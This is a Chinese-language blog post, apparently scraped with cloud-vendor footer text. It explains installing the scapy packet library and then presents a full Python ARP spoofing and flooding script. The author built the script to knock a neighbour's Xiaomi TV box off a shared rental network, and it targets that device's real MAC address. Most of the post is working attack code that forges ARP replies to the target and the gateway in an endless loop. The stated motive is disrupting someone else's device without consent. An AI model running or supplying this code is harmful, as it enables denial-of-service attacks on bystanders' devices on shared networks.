學習scapy,如何學習scrapy
不久前才知道scapy這個工具,相見恨晚。其強大在於可以修改資料包,基於python,使用更加方便。
真正開始研究TCP/IP是在半年前,本人不才,拿著FreeRTOS-TCP/IP源碼看了個把月,仍然迷茫,好在TCP/IP協議部分明白了很多。
一個月前接觸Python,目前正在慢慢熟悉。
Ubuntu14.04安裝scapy
由於我的系統已安裝Python2.7,但是沒有安裝pip,這裡首先安裝pip
1 sudo apt-get install python-pip
如果失敗的話可以嘗試如下一句
1 sudo apt-get update --fix-missing
pip安裝完成之後,安裝scapy
sudo pip install scapy
至此,scapy安裝完成,如下可以測試以下
vmuser@Linux-host:~/案頭$ pythonPython 2.7.3 (default, Oct 26 2016, 21:04:23) [GCC 4.6.3] on linux2Type "help", "copyright", "credits" or "license" for more information.>>> from scapy.all import *>>> a = IP()>>> a<IP |>>>> get_if_hwaddr("eth0")'00:0c:29:70:b1:85'>>>
eth0是我的網卡。
Python3.6
pip install scapy
或者是
pip3 install scapy-python3
ARP ATTACK EXAMPLE (1)
硬體平台:Dragon Board 410C
系統:Debian
python:2.7
一人在外租房,免不了鄰裡間相互打擾,近期有房客看電視且聲音不小,正好手邊有一開發板,計劃用scapy發起ARP攻擊來使其掉線。
ARP攻擊的原理略談一下,基本就是偽造報文,汙染主機或網關的arp緩衝表,複雜一些的就要佯裝網關,中間攻擊。限於本人水平,怎麼簡單怎麼來吧。
首先要知道對方是一個什麼樣的裝置,使用區域網路掃描工具,掃描活動主機,然後根據其MAC來定位到底是哪一個MAC地址,掃描結果如下:
C8-3A-35-C0-05-15 Tenda Technology Co., Ltd.04-E6-76-46-A6-F3 AMPAK Technology, Inc.78-02-F8-34-4D-B5 私營24-09-95-95-E2-02 HUAWEI TECHNOLOGIES CO.,LTD20-47-47-BA-99-1E Dell Inc.70-14-A6-37-3F-0F Apple, Inc.E8-B4-C8-7B-F3-0F Samsung Electronics Co.,Ltd 48-3B-38-D9-8D-D8 Apple, Inc.
其中“AMPAK”最可疑,百度一番後,評鑑為小米盒子。(題外話:AMPAK被多次發現做IP掃描。。。。)
鎖定MAC之後,我猜他們(一對老夫婦,天天看電視,うるさい!!)是逃不了了
1 #!/usr/bin/env python 2 # _*_ coding=utf-8 _*_ 3 4 from scapy.all import * 5 import time 6 import random 7 #------------------------------------------------------- 8 def GetSubNet(OurIP): 9 ''' 10 擷取子網,192.168.0 11 ''' 12 Index = 0 13 SubString = "" 14 while True: 15 num = OurIP.find('.',Index) 16 if num != -1: 17 Index = num + 1 18 if num == -1: 19 SubString = OurIP[:Index] 20 break 21 return SubString 22 #------------------------------------------------------- 23 def GetMac(tgtIP): 24 ''' 25 擷取目標IP的MAC地址。 26 tgtIP:目標IP地址 27 ''' 28 try: 29 tgtMac = getmacbyip(tgtIP) 30 return tgtMac 31 except: 32 print (tgtIP,"請檢查目標IP是否存活") 33 #------------------------------------------------------- 34 def GetBrocastIP(OurIP): 35 ''' 36 擷取區域網路廣播位址 37 OurIP :我們的IP地址 38 ''' 39 return GetSubNet(OurIP) + "255" 40 #------------------------------------------------------- 41 def GetForgetIP(OurIP,Num): 42 ''' 43 偽造IP地址 44 OurIP:我們自己的IP 45 Num:要偽造多少個IP地址 46 ''' 47 SubString = GetSubNet(OurIP) 48 #偽造IP 49 ForgetIP = [] 50 i = 0 51 while i < Num: 52 num = int(random.uniform(0,255)) 53 TempIP = SubString + "%d"%num 54 if TempIP == OurIP: 55 continue 56 else: 57 ForgetIP.append(TempIP) 58 i = i + 1 59 return ForgetIP 60 #------------------------------------------------------- 61 def GetForgeMac(OurMac,Num): 62 ''' 63 產生隨機MAC地址 64 OurMac:我們自己的MAC地址,不能跟自己重複啊 65 ''' 66 ForgeMac = [] 67 j = 0 68 while j < Num: 69 while True: 70 i = 0 71 TempMac = "" 72 while i < 6: 73 num = int(random.uniform(0,255)) 74 TempMac = TempMac + "%02X"%num 75 if i <= 4:TempMac = TempMac + ":" 76 i = i + 1 77 if TempMac == OurMac: 78 pass 79 else: 80 ForgeMac.append(TempMac) 81 j = j + 1 82 break 83 return ForgeMac 84 #------------------------------------------------------- 85 def AttackMac(Mac,face,Num,Interval,GW_IP): 86 ''' 87 攻擊MAC 88 Mac:要攻擊的MAC地址 89 face:發送攻擊報文的網路介面 90 GW:是否只攻擊網關 91 ''' 92 Broadcast_mac = "FF:FF:FF:FF:FF:FF" 93 GW_MAC = "" 94 try: 95 OurIP = get_if_addr(face) 96 if GW_IP != "":GW_MAC = GetMac(GW_IP) 97 except: 98 OurIP = "192.168.0.105" 99 return100 Broadcast_ip = GetBrocastIP(OurIP)101 while True:102 ForgeIP = GetForgetIP(OurIP,Num)103 #產生資料包104 if GW_IP != "":105 #攻擊網關106 pkt = Ether(dst = GW_MAC,src = Mac)/\107 ARP(psrc = ForgeIP,pdst = GW_IP,\108 hwsrc = Mac,hwdst = GW_MAC,op = 2)109 else:110 #攻擊全網111 pkt = Ether(dst = Broadcast_mac,src = Mac)/\112 ARP(psrc = ForgeIP,pdst = Broadcast_ip,\113 hwsrc = Mac,op = 1)114 #發送資料包115 try:116 #print(ls(pkt))117 #input()118 sendp(pkt,iface = face)119 except:120 print("!!Send Error!!")121 break122 time.sleep(float(Interval))123 #-------------------------------------------------------124 def AttackIP(tgtIP,face,Num,Interval,GW_IP):125 '''126 攻擊IP地址127 tgtIP:目標IP128 face:網卡介面129 Num:攻擊報文數目130 Interval:攻擊間隔131 '''132 #廣播位址133 GW_MAC = ""134 Broadcast_mac = "FF:FF:FF:FF:FF:FF"135 #本地136 try:137 OurMac = get_if_hwaddr(face)138 OurIP = get_if_addr(face)139 if GW_IP != "":GW_MAC = GetMac(GW_IP)140 except:141 OurMac = "00:00:00:00:00:00"142 OurIP = "192.168.0.105"143 Broadcast_ip = GetBrocastIP(OurIP)144 while True:145 #準備資料包146 ForgeMac = GetForgeMac(OurMac,Num)147 if GW_IP != "":148 #攻擊網關149 pkt = Ether(dst = GW_MAC,src = ForgeMac)/\150 ARP(psrc = tgtIP,pdst = GW_IP,\151 hwsrc = ForgeMac,hwdst = GW_MAC,op = 2)152 else:153 #攻擊全網154 pkt = Ether(dst = Broadcast_mac,src = ForgeMac)/\155 ARP(psrc = tgtIP,pdst = Broadcast_ip,\156 hwsrc = ForgeMac,op = 1)157 #發送資料包158 try:159 sendp(pkt,iface = face)160 except:161 print("!!Send Error!!")162 break163 #延遲164 time.sleep(float(Interval))165 #-------------------------------------------------------166 Table = {}167 def Scanf(OurIP,Start,End):168 '''169 掃描網路,擷取IP-MAC並儲存170 OurIP:我們的IP地址171 Start:掃描起始地址 172 End:掃描結束位址173 例如:OurIP = 192.168.0.105,Start = 99,End = 150174 掃描IP範圍:192.168.0.99 ~ 192.168.0.150175 '''176 SubString = GetSubNet(OurIP)177 for num in range(Start,End):178 ip = SubString+str(num)179 arpPkt = Ether(dst="ff:ff:ff:ff:ff:ff")/ARP(pdst=ip, hwdst="ff:ff:ff:ff:ff:ff")180 res = srp1(arpPkt, timeout = 1, verbose=0)181 if res:182 Table[res.psrc] = res.hwsrc183 return Table184 #-------------------------------------------------------185 def GetIpByMac(Mac):186 if len(Table) == 0:return None187 return Table.get(Mac)188 189 def Attack_xiaomi(Face,PackNum,Counter,Interval):190 '''191 攻擊小米盒子192 Face:網卡介面193 PackNum:資料包數目194 Counter:攻擊次數(-1:無限次)195 Interval:攻擊間隔196 例如:Face="wlan0",PackNum=10,Counter=-1,Interval=1197 '''198 MY_ip = get_if_addr(Face)199 MY_mac = get_if_hwaddr(Face)200 if MY_ip == None or MY_mac == None:return201 202 GW_ip = "192.168.0.1"203 GW_mac = GetMac(GW_ip)204 if GW_mac == None:return205 206 Scanf(MY_ip,99,150)207 208 XM_mac = "04:E6:76:46:A6:F3"209 XM_ip = GetIpByMac(XM_mac)210 if XM_ip == None:return211 212 while True:213 #Attack packs214 Temp_mac = GetForgeMac(MY_mac,PackNum)215 Temp_ip = GetForgetIP(MY_ip,PackNum)216 217 PKT_2_XM_4_mac = Ether(src = GW_mac,dst = XM_mac)/ARP(psrc = Temp_ip,pdst = XM_ip,op = 2)218 PKT_2_XM_4_ip = Ether(src = Temp_mac,dst = XM_mac)/ARP(psrc = GW_ip,pdst = XM_ip,op = 2)219 PKT_2_GW_4_XM_mac = Ether(src = XM_mac,dst = GW_mac)/ARP(psrc = Temp_ip,pdst = GW_ip,op = 2)220 PKT_2_GW_4_XM_ip = Ether(src = Temp_mac,dst = GW_mac)/ARP(psrc = XM_ip,pdst = GW_ip,op = 2)221 try:222 sendp(PKT_2_XM_4_mac,iface = Face)223 time.sleep(0.5)224 sendp(PKT_2_XM_4_ip,iface = Face)225 time.sleep(0.5)226 sendp(PKT_2_GW_4_XM_mac,iface = Face)227 time.sleep(0.5)228 sendp(PKT_2_GW_4_XM_ip,iface = Face)229 except:230 print("!!Send Error!!")231 #sleep232 num = int(random.uniform(0,Interval))233 time.sleep(num)234 if Counter == -1:235 pass236 else:237 Counter = Counter - 1238 if Counter == 0:239 return240 241 if __name__ == "__main__":242 #while True:243 #AttackIP("192.168.0.108","wlan0",10,60,"192.168.0.1")244 #AttackMac(Mac,face,Num,Interval,GW_IP):245 #AttackMac("C8:3A:35:C0:05:15","wlan0",2,2,"192.168.0.108")246 while True:247 Attack_xiaomi("wlan0",20,30,5)
Start building with 50+ products and up to 12 months usage for Elastic Compute Service
1 on 1 presale consultation
24/7 Technical Support 6 Free Tickets per Quarter Faster Response
Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.
A comprehensive suite of global cloud computing services to power your business
Payment Methods We Support
